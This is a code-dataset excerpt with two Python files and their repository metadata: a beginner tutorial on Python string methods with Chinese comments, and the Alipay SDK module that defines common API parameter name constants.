hello_str = "hello word"
# 1.判断是否以指定字符串开始
print(hello_str.startswith("he"))
# 2.判断是否以指定字符串结束
print(hello_str.endswith("word"))
# 3.查找指定字符串
# index同样可以查找指定的字符串在大字符串中的索引
print(hello_str.find("lo"))
# index 如果指定的字符串不存在,会报错
# find如果指定的字符串不存在,会返回-1
# print(hello_str.index("abc"))
print(hello_str.find("abc"))
# 4.替换字符串
# replace 方法执行完成后,会返回一个新的字符串
# 注意:不会修改原有的字符串内容
print(hello_str.replace("word", "python"))
print(hello_str)
|
[
"xujinshan361@163.com"
] |
xujinshan361@163.com
|
e40d8657052e26d4cd67730ceea350b9fcbf5a6c
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/constant/ParamConstants.py
|
1de953edff0cd37434ed88f9fc6c6feb2d8c34c5
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 938
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 2017-12-20
@author: liuqun
'''
COMMON_PARAM_KEYS = set()
P_APP_ID = "app_id"
COMMON_PARAM_KEYS.add(P_APP_ID)
P_METHOD = "method"
COMMON_PARAM_KEYS.add(P_METHOD)
P_FORMAT = "format"
COMMON_PARAM_KEYS.add(P_FORMAT)
P_CHARSET = "charset"
COMMON_PARAM_KEYS.add(P_CHARSET)
P_SIGN_TYPE = "sign_type"
COMMON_PARAM_KEYS.add(P_SIGN_TYPE)
P_SIGN = "sign"
COMMON_PARAM_KEYS.add(P_SIGN)
P_ENCRYPT_TYPE = "encrypt_type"
COMMON_PARAM_KEYS.add(P_ENCRYPT_TYPE)
P_TIMESTAMP = "timestamp"
COMMON_PARAM_KEYS.add(P_TIMESTAMP)
P_VERSION = "version"
COMMON_PARAM_KEYS.add(P_VERSION)
P_NOTIFY_URL = "notify_url"
COMMON_PARAM_KEYS.add(P_NOTIFY_URL)
P_RETURN_URL = "return_url"
COMMON_PARAM_KEYS.add(P_RETURN_URL)
P_AUTH_TOKEN = "auth_token"
COMMON_PARAM_KEYS.add(P_AUTH_TOKEN)
P_APP_AUTH_TOKEN = "app_auth_token"
COMMON_PARAM_KEYS.add(P_APP_AUTH_TOKEN)
P_BIZ_CONTENT = "biz_content"
|
[
"liuqun.lq@alibaba-inc.com"
] |
liuqun.lq@alibaba-inc.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.